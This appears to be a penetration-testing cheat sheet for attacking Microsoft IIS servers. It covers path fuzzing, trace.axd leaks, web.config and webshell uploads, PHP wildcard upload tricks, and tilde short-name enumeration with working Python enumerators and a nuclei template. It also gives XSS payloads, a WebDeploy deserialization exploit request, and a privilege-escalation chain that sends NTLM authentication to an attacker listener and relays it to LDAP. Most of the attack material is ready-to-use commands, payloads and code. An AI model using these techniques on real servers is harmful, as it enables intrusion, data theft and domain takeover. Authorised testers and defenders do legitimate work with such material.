# IIS

## Fuzzing

```
/trace.axd
/trace.axd?id=1
/admin/help.cgi
/admin/help.cgi.bak
/admin/WS_FTP.LOG
/adovbs.inc
/confirm.asp.bak
/default.asp.bak
/login.asp.bak
/pindex.asp.bak
/rootlogin.asp.bak
/rootlogin.asp.old
/_vti_pvt/service.cnf
/include/common.inc
/WS_FTP.LOG
/service.cnf
/aspnet_client
/global.asax
/msdeploy.axd          <-- Web Deploy endpoint, check CVE-2025-53772
```

Wordlists

{% embed url="<https://github.com/coffinxp/payloads/blob/main/iis.txt>" %}

{% embed url="<https://github.com/coffinxp/payloads/blob/main/aspx.txt>" %}

{% embed url="<https://github.com/reewardius/iis-pentest/tree/main>" %}

{% embed url="<https://github.com/nu11pointer/fuzzlists/blob/main/Discovery/iisfinal.txt>" %}

## trace.axd enabled

If ASP.NET tracing is on (`<trace enabled="true" localOnly="false" />` in `web.config`), `/trace.axd` lists recent requests with their headers, cookies, form fields, session state and server variables: an information leak, often including other users' data.

## Information disclosure

Try a path that fails ASP.NET request validation:

```
target.com/><img>
```

This often returns a verbose ASP.NET error page that discloses the .NET/IIS version, the physical path or a stack trace.

## PUT method enabled

If the `PUT` verb is allowed (check with an `OPTIONS` request, or look for WebDAV), try uploading an `.aspx` webshell or a `web.config`.

## Insecure Upload File

Try to upload `web.config`

{% embed url="<https://soroush.me/blog/2014/07/upload-a-web-config-file-for-fun-profit/>" %}

{% embed url="<https://soroush.me/blog/2019/08/uploading-web-config-for-fun-and-profit-2/>" %}

### Website using PHP

When PHP runs on IIS, the Windows file API used to save the upload interprets `<` as `*`, `>` as `?` and `"` as `.` in the file name. Sending `filename="web<<"` in the upload request therefore overwrites an existing file matching `web*` in the target directory. If that wildcard hits another file first (for example `web.aspx`), narrow it with `filename="web<<>fig"` or `filename='web"config'`.

{% embed url="<https://soroush.me/blog/2014/07/file-upload-and-php-on-iis-wildcards/>" %}

## web.config or web.xml

```
https://x.x.x.x/.//WEB-INF/web.config
https://x.x.x.x/.//WEB-INF/web.xml
```

## Viewstate

{% embed url="<https://github.com/0xacb/viewgen>" %}

{% embed url="<https://notsosecure.com/exploiting-viewstate-deserialization-using-blacklist3r-and-ysoserial-net#PoC>" %}

## Internal IP disclosure

IIS (and Exchange in front of it) builds self-referential redirects from the request's `Host` header; with an HTTP/1.0 request that has no `Host` header the `Location` may be filled in from the server's own binding instead. Note that curl still sends a `Host` header in `--http1.0` mode, so if the first attempt only returns the public name, add `-H 'Host:'` to drop it.

```
> curl -v --http1.0 http://example.com

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache
Pragma: no-cache
Location: https://192.168.5.237/owa/
Server: Microsoft-IIS/10.0
X-FEServer: NHEXCHANGE2016
```
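The same check done without curl, as an added example that is not part of the page: a raw HTTP/1.0 request with no `Host` header at all, and a parser that flags private IPv4 addresses and bare server names in the response headers. The header names `X-BEServer` and `X-CalculatedBETarget` are Exchange headers added here alongside the page's `X-FEServer`; the sample response is the one shown above, embedded as a constructed string so the parser can be run offline.

```python
import ipaddress
import re
import socket
import ssl
from typing import Dict, List

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Headers in which IIS / Exchange echo an internal server name.
NAME_HEADERS = ("x-feserver", "x-beserver", "x-calculatedbetarget")


def http10_request(host: str, port: int = 80, path: str = "/",
                   use_tls: bool = False, timeout: float = 5.0) -> str:
    """Send 'GET <path> HTTP/1.0' with NO Host header and return the raw
    response head. Without a Host header the server cannot copy the client's
    name into a self-referential redirect and may use its own binding."""
    request = f"GET {path} HTTP/1.0\r\nUser-Agent: iis-check\r\n\r\n".encode()
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        if use_tls:
            ctx = ssl.create_default_context()
            ctx.check_hostname = False          # probing, not trusting
            ctx.verify_mode = ssl.CERT_NONE
            sock = ctx.wrap_socket(sock, server_hostname=host)
        sock.sendall(request)
        data = b""
        while b"\r\n\r\n" not in data:
            chunk = sock.recv(4096)
            if not chunk:
                break
            data += chunk
    finally:
        sock.close()
    return data.split(b"\r\n\r\n", 1)[0].decode("latin-1")


def is_internal(ip: str) -> bool:
    """True for RFC 1918, loopback and link-local IPv4 addresses."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return addr.is_private or addr.is_loopback or addr.is_link_local


def find_leaks(raw_head: str) -> Dict[str, List[str]]:
    """Return {header-name: [leaked values]} for headers carrying a private
    IPv4 address or (for the known Exchange/IIS headers) a server name."""
    leaks: Dict[str, List[str]] = {}
    for line in raw_head.splitlines()[1:]:          # skip the status line
        if ":" not in line:
            continue
        name, value = line.split(":", 1)
        name, value = name.strip().lower(), value.strip()
        internal = [ip for ip in IPV4.findall(value) if is_internal(ip)]
        if internal:
            leaks.setdefault(name, []).extend(internal)
        elif name in NAME_HEADERS and value:
            leaks.setdefault(name, []).append(value)
    return leaks


# Constructed sample: the response shown above, as a raw head.
SAMPLE_HEAD = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Cache-Control: no-cache\r\n"
    "Pragma: no-cache\r\n"
    "Location: https://192.168.5.237/owa/\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-FEServer: NHEXCHANGE2016"
)

if __name__ == "__main__":
    print(find_leaks(SAMPLE_HEAD))
    # Live use: print(find_leaks(http10_request("example.com")))
```

Run it against `/`, against a directory path without its trailing slash (IIS answers with a 301 to the slash-terminated path) and over TLS with `use_tls=True`; the three redirects are built by different code paths and do not always leak the same way.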

## Tilde Enumeration

```
http://example.com/a*~1*/.aspx
http://example.com/b*~1*/.aspx
http://example.com/c*~1*/.aspx
...
```

Assume the server contains a hidden directory named SecretDocuments. Its 8.3 alias is `SECRET~1`, so the request `http://example.com/s*~1*/.aspx` is answered differently from one whose prefix matches nothing (on the classic vulnerable versions `404 Not Found` for a match and `400 Bad Request` for no match; compare against a random prefix rather than trusting fixed codes). That reveals a name starting with "s"; extend the prefix one character at a time:

```
http://example.com/se*~1*/.aspx
http://example.com/sf*~1*/.aspx
http://example.com/sg*~1*/.aspx
...
```

Once the short name `secret~1` is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents

```
http://example.com/secret~1/somefile.txt
http://example.com/secret~1/anotherfile.docx
```

The same IIS tilde directory enumeration technique can also detect 8.3 short file names for files within the directory.

```
http://example.com/secret~1/somefi~1.txt
```

If two files named `somefile1.txt` and `somefile2.txt` exist in the same directory, their 8.3 short names are:

* `somefi~1.txt` for `somefile1.txt`
* `somefi~2.txt` for `somefile2.txt`

A name that already fits 8.3 (`somefile.txt`: eight-character stem, three-character extension) gets no alias at all and cannot be found this way; only names longer than 8.3, or containing spaces or extra dots, have one.
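The prefix search above written out as an added example; this is not code from the page or from any of the scanners linked below, but it is the loop they all run. The one assumption is the `probe` callable: in real use it issues `GET /<pattern>/a.aspx` and returns the status code; here a constructed in-memory stand-in for a vulnerable IIS plays that role so the enumerator runs offline.

```python
import fnmatch
import random
import string
from typing import Callable, Iterable, List

# Characters tried at each position of the 8.3 stem.
CHARSET = string.ascii_lowercase + string.digits + "_-"


def make_fake_iis(short_names: Iterable[str]) -> Callable[[str], int]:
    """Constructed stand-in for a vulnerable IIS (not a real server).

    A vulnerable IIS answers /se*~1*/a.aspx with 404 when some 8.3 name
    matches the wildcard pattern and with another status (400 on the
    classic targets) when nothing does. Real servers differ in the exact
    codes, which is why the enumerator compares against a baseline.
    """
    names = [n.upper() for n in short_names]

    def probe(pattern: str) -> int:
        pat = pattern.upper()
        return 404 if any(fnmatch.fnmatchcase(n, pat) for n in names) else 400

    return probe


def enumerate_short_names(probe: Callable[[str], int],
                          max_len: int = 6,
                          charset: str = CHARSET) -> List[str]:
    """Recover 8.3 stems (e.g. 'secret~1') one character at a time.

    probe(pattern) must return the HTTP status for GET /<pattern>/a.aspx.
    Only the ~1 alias is searched; extensions are left to the caller.
    """
    # Baseline: an 8-character prefix can never precede '~1' in an 8.3 name,
    # so this pattern matches nothing and yields the "no match" status.
    baseline = probe("".join(random.choices(charset, k=8)) + "*~1*")

    def hit(pattern: str) -> bool:
        return probe(pattern) != baseline

    if not hit("*~1*"):               # nothing enumerable, or not vulnerable
        return []

    found: List[str] = []
    stack = [""]
    while stack:
        prefix = stack.pop()
        for ch in charset:
            cand = prefix + ch
            if not hit(cand + "*~1*"):
                continue                   # no name starts with cand
            if hit(cand + "~1*"):
                found.append(cand + "~1")  # cand is a complete stem
            if len(cand) < max_len:
                stack.append(cand)         # longer stems may share it
    return sorted(found)


if __name__ == "__main__":
    # Constructed target: the names from the scanner output further down.
    fake = make_fake_iis(["ASPNET~1", "UPLOAD~1", "TRANSF~1.ASP", "CSASPX~1.CS"])
    print(enumerate_short_names(fake))
```

The per-request cost is about `len(charset)` probes per discovered character, which is why the real scanners are rate-limited and why the page suggests a Burp extension or nuclei for a quick yes/no before running a full scan.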

## **IIS Tilde Enumeration Scanner - Burp Extension**

<figure><img src="/files/RxNElUBpi3zI2T7SRUno" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/O9bojMOFnvgSCWbJmzlH" alt=""><figcaption></figcaption></figure>

## **Nuclei Template**

<https://github.com/coffinxp/priv8-Nuclei/blob/main/iis.yaml>

```yaml
id: iis-shortname

info:
  name: iis-shortname
  author: coffin
  severity: low
  description: When IIS runs on an old .NET Framework it is possible to enumerate 8.3 short names of files and folders with the ~ character.
  reference:
    - https://github.com/irsdl/IIS-ShortName-Scanner
    - https://github.com/lijiejie/IIS_shortname_Scanner
    - https://www.exploit-db.com/exploits/19525
  tags: iis

variables:
  randstring: "{{to_lower(rand_base(8))}}"

requests:
  - raw:
      # Requests come in pairs: a random prefix that cannot exist, then the
      # bare wildcard that matches any 8.3 name. A vulnerable server answers
      # the two differently (404 for the match, another status otherwise).
      - |
        GET /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        GET /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        OPTIONS /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        OPTIONS /*~1*/a.aspx' HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        DEBUG /{{randstring}}*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
      - |
        DEBUG /*~1*/a.aspx HTTP/1.1
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8

    req-condition: true
    matchers:
      - type: dsl
        dsl:
          # (non-existent != 404 and wildcard == 404) for any of the three verbs
          - "status_code_1 != 404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404 || status_code_5 != 404 && status_code_6 == 404"
```

## ShortScan

{% embed url="<https://github.com/bitquark/shortscan>" %}

```
shortscan http://yourtarget.com -F
```

## **IIS ShortName Scanner**

{% embed url="<https://github.com/irsdl/IIS-ShortName-Scanner>" %}

```shell-session
java -jar iis_shortname_scanner.jar 0 5 http://10.129.204.231/

Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
# IIS Short Name (8.3) Scanner version 2023.0 - scan initiated 2023/03/23 15:06:57
Target: http://10.129.204.231/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/
|_ Extra information:
  |_ Number of sent requests: 553
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 3
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ CSASPX~1.CS??
    |_ TRANSF~1.ASP
```

<figure><img src="/files/rsCI6THCXlHYsYApUYgn" alt=""><figcaption></figcaption></figure>

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit `GET` access to `http://10.129.204.231/TRANSF~1.ASP`, necessitating the brute-forcing of the remaining filename.

Or:

{% embed url="<https://github.com/lijiejie/IIS_shortname_Scanner>" %}

```
# python iis_shortname_scan.py http://target
```

### **Generate Wordlist**

```shell-session
# 8.3 names are upper case, so match the recovered stem case-insensitively
grep -rhi '^transf' /usr/share/wordlists/ | sort -u > /tmp/list.txt
```

### Fuzzing

```shell-session
gobuster dir -u http://10.129.204.231/ -w /tmp/list.txt -x .aspx,.asp
```
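The brute-force list can be tightened further, because the 8.3 rules say exactly which long names can produce a given short name. The following is an added example, not from the page or from any of the tools above: a short-name generator that reproduces the `~1`/`~2` numbering from the tilde section, and a filter that keeps only wordlist entries whose alias would be the recovered name. The collision numbering and the rule that names already fitting 8.3 get no alias are standard NTFS behaviour; the wordlist and extensions in the usage are constructed.

```python
from typing import Dict, Iterable, List

# Characters (besides letters and digits) allowed in an 8.3 name.
SPECIALS = "!#$%&'()-@^_`{}~"


def _component(text: str) -> str:
    """Upper-case one name component the way the short-name generator does:
    drop spaces and dots, replace other illegal characters with '_'."""
    text = text.upper().replace(" ", "").replace(".", "")
    return "".join(c if (c.isascii() and c.isalnum()) or c in SPECIALS else "_"
                   for c in text)


def short_names(long_names: Iterable[str]) -> Dict[str, str]:
    """Map long names to their 8.3 aliases, numbering collisions in creation order.

    Assumption: plain NTFS tilde numbering (~1, ~2, ...), no hash-style names.
    A name that already fits 8.3 gets no alias, so tilde enumeration cannot see it.
    """
    used = set()
    out: Dict[str, str] = {}
    for name in long_names:
        stem, dot, ext = name.rpartition(".")
        if not dot:                 # no extension at all
            stem, ext = name, ""
        elif not stem:              # leading dot, e.g. .htaccess
            stem, ext = ext, ""
        s, e = _component(stem), _component(ext)[:3]
        suffix = "." + e if e else ""
        if name.upper() == s + suffix and len(s) <= 8 and len(e) <= 3:
            out[name] = name.upper()    # already a valid 8.3 name: no alias
            used.add(out[name])
            continue
        for n in range(1, 10000):
            alias = f"{s[:6]}~{n}{suffix}"
            if alias not in used:
                break
        used.add(alias)
        out[name] = alias
    return out


def expand_candidates(short: str, words: Iterable[str],
                      extensions: Iterable[str]) -> List[str]:
    """Keep only wordlist entries whose 8.3 alias would be the recovered short
    name (assumes it was the first to claim that stem, i.e. ~1)."""
    short = short.upper()
    return [w + ext
            for w in words for ext in extensions
            if short_names([w + ext])[w + ext] == short]


if __name__ == "__main__":
    print(short_names(["somefile1.txt", "somefile2.txt", "somefile.txt", "web.config"]))
    # Constructed wordlist and the extensions gobuster was given above.
    print(expand_candidates("TRANSF~1.ASP",
                            ["transfer", "transform", "transfo", "index"],
                            [".asp", ".aspx"]))
```

Note what the filter throws away: `transfer.asp` and `transfo.asp` are already valid 8.3 names, so neither could have produced `TRANSF~1.ASP`; the `.asp`/`.aspx` extensions both collapse to `.ASP`, which is why the `-x .aspx,.asp` pair in the gobuster command is needed even though the scanner reported `.ASP`.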

## XSS

```
http://domain.com/dossier/(Z("onerror="alert%601%60"))/file.aspx

http://domain.com/dossier/(Z("onerror="confirm%60Redirect%20Login%60"))/file.aspx
```

See the ASP part of the XSS page:

{% content-ref url="/pages/3ptIFDNOAiza85XhvHQO" %}
[XSS](/0xss0rz/pentest/web-attacks/xss.md)
{% endcontent-ref %}

## CVE-2025-53772 IIS WebDeploy RCE

```
/msdeploy.axd
```

{% embed url="<https://hawktrace.com/blog/cve-2025-53772>" %}

{% embed url="<https://gist.github.com/hawktrace/67836c7e9f35b72077b50f220349cd73>" %}

The `MSDeploy.SyncOptions` header carries a gzip-compressed, base64-encoded serialized object (hence the `H4sI` prefix). Per the writeup, sending the generated payload in an HTTP POST to `/msdeploy.axd` results in calc.exe launching on the server.

```
POST /msdeploy.axd HTTP/1.1
Host: msdeploy.webserver.com
MSDeploy.RequestId: 1
Content-Type: application/msdeploy
MSDeploy.Method: Sync
MSDeploy.SyncOptions: H4sIAAAAAAAAA...[Generated Payload]
Content-Length: 0
```

## Resources

{% embed url="<https://infosecwriteups.com/how-to-find-bugs-in-microsoft-iis-page-ef336a229abc>" %}

{% embed url="<https://medium.com/@far00t01/asp-net-microsoft-iis-pentesting-04571fb071a4>" %}

{% embed url="<https://pentestbook.six2dez.com/enumeration/webservices/iis>" %}

{% embed url="<https://github.com/reewardius/iis-pentest>" %}

## Script to configure IIS

{% embed url="<https://gist.github.com/kking124/7f34ca1f2b98c21753e3ecd8ecb86663>" %}

## Privilege Escalation

From code execution as the IIS application pool identity (which authenticates over the network as the machine account), coerce an HTTP NTLM authentication from that account to your listener:

```
powershell iwr http://192.168.56.1 -UseDefaultCredentials
```

<figure><img src="/files/UBZvZ6kH1jsrTcKGCbtP" alt=""><figcaption></figcaption></figure>

then relay it to LDAP and either:

* StartTLS + add a computer account to the domain + RBCD on the web server, or
* shadow credentials

Example with RBCD :

<figure><img src="/files/6RZJpiFlyX91SXx7M11C" alt=""><figcaption></figcaption></figure>

Shell as admin:

<figure><img src="/files/UCRgsUwvn88tzqG4Ev92" alt=""><figcaption></figcaption></figure>

Credit: [M4fly](https://x.com/M4yFly/status/1745581076846690811)



